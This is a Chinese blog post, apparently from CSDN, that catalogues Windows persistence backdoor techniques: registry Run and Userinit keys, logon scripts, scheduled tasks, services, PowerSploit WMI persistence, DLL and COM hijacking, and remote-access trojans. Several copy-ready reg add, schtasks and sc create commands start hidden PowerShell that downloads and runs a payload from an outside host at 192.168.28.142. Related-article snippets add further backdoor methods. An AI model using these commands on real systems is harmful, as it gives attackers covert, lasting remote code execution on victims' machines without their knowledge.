Windows下常见的权限维持方法

最新推荐文章于 2024-07-05 23:20:56 发布
最新推荐文章于 2024-07-05 23:20:56 发布
阅读量1.4k 收藏 4
点赞数 1
分类专栏: windows安全 文章标签: 权限维持
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_97_97/article/details/103342732
版权

0x01 注册表自启动

可以通过修改注册表自启动的键值,添加一个木马程序路径,实现开机自启动
常见的注册表启动键:

# Run键 
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

# Winlogon\Userinit键
HKEY_CURRENT_USER\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon

使用以下命令可以一键实现无文件注册表后门:

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Keyname" /t REG_SZ /d "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.28.142:8888/logo.gif'))\"" /f

Logon Scripts后门
注册表路径:HKEY_CURRENT_USER\Environment
创建字符串键值:UserInitMprLogonScript,键值设置为bat的绝对路径:c:\test.bat
userinit后门
在用户进行登陆时,winlogon运行指定的程序。根据官方文档,可以更改它的值来添加与删除程序。
利用userinit注册表实现无文件后门:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="C:\\Windows\\system32\\userinit.exe,C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.28.142:8888/logo.gif'))\""

0x02 组策略设置脚本启动

运行gpedit.msc进入本地组策略,通过Windows设置的“脚本(启动/关机)”项来实现,因为其机具隐蔽性,因此常常被攻击者利用来做服务器后门。

0x03 计划任务

通过Windows系统的任务计划程序功能实现定时启动某个任务,执行某个脚本,使用以下命令可以实现

schtasks /create /sc minute /mo 1 /tn "Security Script" /tr "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring(\"\"\"http://192.168.28.142:8888/logo.gif\"\"\"))\""

0x04 服务自启动

通过服务设置自启动,结合powershell实现无文件后门。
使用以下命令可以实现:

sc create "KeyName" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.28.142:8888/logo.gif'))\""
sc description  KeyName "Just For Test"   //设置服务的描述字符串
sc config Name start= auto                //设置这个服务为自动启动
net start Name                            //启动服务

0x05 WMI后门

在2015年的blackhat大会上Matt Graeber介绍了一种无文件后门就是用的WMI。这里可以利用一个工具powersploit,下面用它的Persistence模块来示范一个简单的例子。

Import-Module .\Persistence\Persistence.psm1
$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM'
$UserOptions = New-UserPersistenceOption -Registry -AtLogon
Add-Persistence -FilePath .\EvilPayload.ps1 -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose

0x06 dll劫持

如果在进程尝试加载一个DLL时没有指定DLL的绝对路径,那么Windows会尝试去指定的目录下查找这个DLL;如果攻击者能够控制其中的某一 个目录,并且放一个恶意的DLL文件到这个目录下,这个恶意的DLL便会被进程所加载,从而造成代码执行。
比较常用的如LPK.dll的劫持:
win7及win7以上系统增加了KnownDLLs保护,需要在注册表:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\ExcludeFromKnownDlls

下添加“lpk.dll”才能顺利劫持。

0x07 COM劫持

利用COM劫持技术,最为关键的是dll的实现以及CLSID的选择,通过修改CLSID下的注册表键值,实现对CAccPropServicesClass和MMDeviceEnumerator劫持,而系统很多正常程序启动时需要调用这两个实例。这种方法可以绕过Autoruns对启动项的检测。

0x08 远程控制

远控木马是一种恶意程序,其中包括在目标计算机上用于管理控制的后门。远程访问木马通常与用户请求的程序(如游戏程序)一起,是一种看不见的下载,或作为电子邮件附件发送。一旦主机系统被攻破,入侵者可以利用它来向其他易受感染的计算机分发远程访问木马,从而建立僵尸网络。
一般分为客户端和服务端,如:灰鸽子、上兴远控、梦想时代、QuasarRAT等。

以上资源参考微信公众号[ Bypass ]
在这里插入图片描述

老头儿给钱
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Windows权限维持
谢公子的博客
05-28 2269
目录 创建隐蔽账号 进程迁移 启动目录 横向渗透 在红蓝对抗实战中,当我们获取到一台Windows主机的权限后,首先要做的就是怎么维持住该权限。因为防守方的实力也在不断增强,并且他们的流量监测设备也在不断监控,如果发现机器被植入木马,他们肯定会采取措施。 比如采取以下几点措施: 查杀木马进程 重启主机 断网 关闭主机 而对于我们维持权限,可以有以下几点: 创建隐蔽账号 如果目标主机的3389端口开放着,则我们可以创建隐蔽账号。 或者读取该主机administrator账号密码,使用
2024年最新Windows权限维持技术总结、复现_cs权限维持,网络安全开发技术总结
2401_84264692的博客
05-06 863
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon的作用是指定用户登录时 Winlogon 运行的程序。默认情况下,Winlogon 运行 Userinit.exe(运行登录脚本),重新建立网络连接,然后启动 Windows 用户界面 Explorer.exe。可以更改此条目的值以添加或删除程序。
权限维持篇---Windows权限维持--隐藏篇
永不垂头的博客
04-29 1118
权限维持篇—Windows权限维持–隐藏篇 文章目录权限维持篇---Windows权限维持--隐藏篇前言一、隐藏文件二、隐藏账号三、端口复用四、进程注入五、结束六、我的公众号 前言 攻击者在获取服务器权限后,通常会用一些后门来维持权限,如果你想让你的后门保持的更久些,那么请隐藏好它,使之不易被管理员发现。 一、隐藏文件 1、利用文件属性最简单的一种隐藏文件的方式,文件右键属性,勾选隐藏,点击确定后,在这个文件里看不到刚刚的文件了。 如果要让文件显示出来,就点击查看,勾选显示隐藏的文件,文件就显示出来。
应急响应-win&linux分析后门&勒索病毒&攻击
xhscxj的博客
03-26 4646
操作系统(windows,linux)应急响应: 1.常见危害:暴力破解,漏洞利用,流量攻击,木马控制(Webshell,PC 木马等),病毒感染(挖矿,蠕 虫,勒索等)。 2.常见分析:计算机账户,端口,进程,网络,启动,服务,任务,文件等安全问题 常见日志类别及存储: Windows,Linux 补充资料: https://xz.aliyun.com/t/485 https://www.secpulse.com/archives/114019.html https://docs.microsoft.
内网渗透-windows权限维持方法
lza20001103的博客
04-14 1262
内网渗透-windows权限维持方法
windows操作系统后门
m0_68353775的博客
10-04 692
影子账户   创建隐藏账户的方式: 创建一个隐藏账户"net user test$ password /add",隐藏账户无法使用"net user"命令查看,但是可以在"本地用户和组"里面查看。 打开注册表"HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names"找到创建的隐藏账户(test$),在这个注册表里面可以看见test$账户的类型,同样可以查看计算机Administr
修改注册表的monitor键值进行权限维持
Shanfenglan's blog
03-04 420
文章目录操作效果 操作 需要管理员权限,将恶意的dll文件上传到system32文件夹下: copy test.dll c:\windows\system32 reg add "hklm\system\currentcontrolset\control\print\monitors\Pentestlab" /v "Driver" /d "test.dll" /t REG_SZ 效果 当主机重启的时候会触发后门,且后门以system权限启动。 ...
52-2 权限维持4 - 启动项注册表键后门
最新发布
weixin_43263566的博客
07-05 408
我们可以通过将后门程序添加到系统的启动文件夹或者注册表的运行键来实现权限的持久化。添加后门程序后,它将在用户登录时启动,并且具备与账户关联的权限级别。一、系统启动文件夹将程序放置在启动文件夹中会导致该程序在用户登录时自动执行。Windows 系统通常有两个常见的启动文件夹:# Username 是你登录账号的名称程序放置于此文件夹内将在具体用户登录时启动。位于所有用户的启动文件夹:程序放置于此文件夹内将在所有用户登录时启动。
注册表后门持久的思考
战神/calmness的博客
09-22 848
目录 准备环境 过程 比较说明【可执行文件留持久后门】 结果上线!!! 或者 准备环境 windows10 虚拟机 Cobalt Strike【这里部署在Windows10上,服务器置于云上】 过程 远程木马控制了windows10虚拟机,利用Cobalt Strike 在Cobalt Strike下进入beacon 比较说明【可执行文件留持久后门】 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersi
权限维持简单总结
Aiwin的博客
08-17 4053
权限维持简单总结
Windows常见的几种权限维持
hackzkaq的博客
05-24 1667
零基础学黑客,搜索公众号:白帽子左一 1.映像劫持技术 简介 “映像劫持”,也被称为“IFEO”(Image File Execution Options),在WindowsNT架构的系统里,IFEO的本意是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定。 当一个可执行程序位于IFEO的控制中时,它的内存分配则根据该程序的参数来设定,而WindowsN T架构的系统能通过这个注册表项使用与可执行程序文件名匹配的项目作为程序载入时的控制依据,最终得以设定一个程序的堆管理机制和一些辅助
Window下常见权限维持方式
12-02 4万+
在获取服务器权限后,通常会用一些后门技术来维持服务器权限,服务器一旦被植入后门,攻击者便如入无人之境。本文将对常见的window服务端自启动后门技术进行解析,知己知彼方能杜绝后门。 0x01 注册表自启动 通过修改注册表自启动键值,添加一个木马程序路径,实现开机自启动。 常用的注册表启动键: # Run键 HKEY_CURRENT_USER\Software\Microsoft\Win...
十三、权限维持
谢小二的博客
06-12 1309
权限维持
权限维持新老技术
热门推荐
Shanfenglan's blog
08-04 34万+
参考资料 权限维持相关 静默宏木马 可以使用静默宏木马进行权限维持。利用cs创建宏木马插入docx文件中。 制作方法 1.利用CS生成vbs代码 2.创建一个docx文档并创建宏且将宏的位置设置为对所有的活动模版和文档,如下图所示 3.将恶意vbs代码加入到Nomal的This Document模块 4.保存文件并运行,主机上线,且以后这个电脑上的任意word文档打开后都会上线,除非删掉这个宏配置。 tips 杀软对doc文件杀软查杀力度远大于对docx文件的。 参考 静默宏木马进行
Windows权限维持-Windows服务
qq_45434762的博客
08-08 371
在获取到目标主机的权限后,一般需要使用一些后门技术对主机的权限进行维持,以保持我们对目标主机的长期控制在获取到目标主机的权限后,一般需要使用一些后门技术对主机的权限进行维持,以保持我们...
windows权限维持大结局
Ms08067安全实验室
09-22 487
文章来源|MS08067 红队攻防实战班作业本文作者:苏杰波、李布杰(红队攻防实战班2期学员)1.通过组策略运行指定脚本添加隐藏用户在“开始菜单”->“运行”中输入gped...
Windows 常见权限维持方式
05-21
以下是 Windows 常见权限维持方式: 1. 提权攻击:攻击者通过利用系统或应用程序的漏洞,获取更高的权限。 2. 横向渗透:攻击者通过已经获得的用户帐户,尝试在网络内部扩散并获取更高的权限。 3. 后门:攻击者在系统中留下后门,使得他们可以随时远程访问系统。 4. 恶意代码:攻击者通过植入恶意代码来获取权限,如键盘记录器、木马等。 5. 弱口令:攻击者通过猜测或暴力破解密码来获取更高的权限。 6. 特权提升:攻击者通过以管理员身份运行的应用程序或服务,获取更高的权限。 7. 摆脱防御机制:攻击者通过绕过安全软件或删除安全软件来保持权限。 需要注意的是,要保护系统免受这些攻击,可以采取一系列措施,如定期更新系统和应用程序补丁、加强访问控制、使用安全软件等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值